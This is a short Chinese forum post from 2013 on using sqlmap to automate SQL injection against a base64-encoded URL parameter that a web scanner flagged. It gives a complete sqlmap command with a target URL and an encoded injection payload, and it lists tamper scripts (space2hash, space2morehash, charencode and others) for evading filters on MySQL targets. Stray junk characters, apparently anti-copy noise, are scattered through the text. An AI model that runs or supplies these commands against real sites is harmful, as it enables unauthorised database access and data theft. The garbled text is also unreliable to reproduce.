WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
# |, m4 q; U. i7 S; v2 z7 `( X3 u
sqlmap的tamper里有个base64encode.py5 Y' H m- v) U
, [! G/ h# L# ^1 ^. c) ~
使用如下
2 P& w/ {& k& H5 U0 d" P, ?: @1 E
4 x* }' [7 l5 W/ m& w1 ?sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
. ?" T3 ~8 o. C0 q6 F: y5 R( M4 _6 {/ _
& \7 ^0 Y; O& z9 G. {4 _
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
# H$ i }: Z* [3 y# o, {1 B s1 g. X( p( m
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
# P3 p6 R+ n* r2 x7 \( k# u& Q8 ?! G; N2 D
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入1 T2 i, k0 C* L; ^8 X/ C3 u4 t
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入5 {" U& R* b& d, E) h+ f
首先确定目标数据库版本,然后选择相应的脚本。8 ~/ L$ x# h4 _& p; a5 i
-v 3 --batch --tamper "space2hash.py"8 Z1 f& k& T; W7 G- l+ y
! E1 K& ~8 g R, G9 Y3 G还有其他一些插件:
9 U; y5 Q' s. g/ C8 b2 H" lencodes编码 ——charencode.py& k3 q. p3 ^4 Z3 \
base64编码 —— base64encode.py
8 h6 D% P# Q5 j: g) @7 t2 ~替换空格和关键字 —— halfversionedmorekeywords.py
/ |0 t9 v8 P& t! w0 Y A |
, s* C$ y7 S) o9 ^1 B6 \8 J4 |3 g% ]
; C' n% d9 Q4 O) Z2 U. |+ ^% Q: r" S6 e& ?8 X$ J
|
发表于 2013-11-23 15:50:45
收藏
支持
反对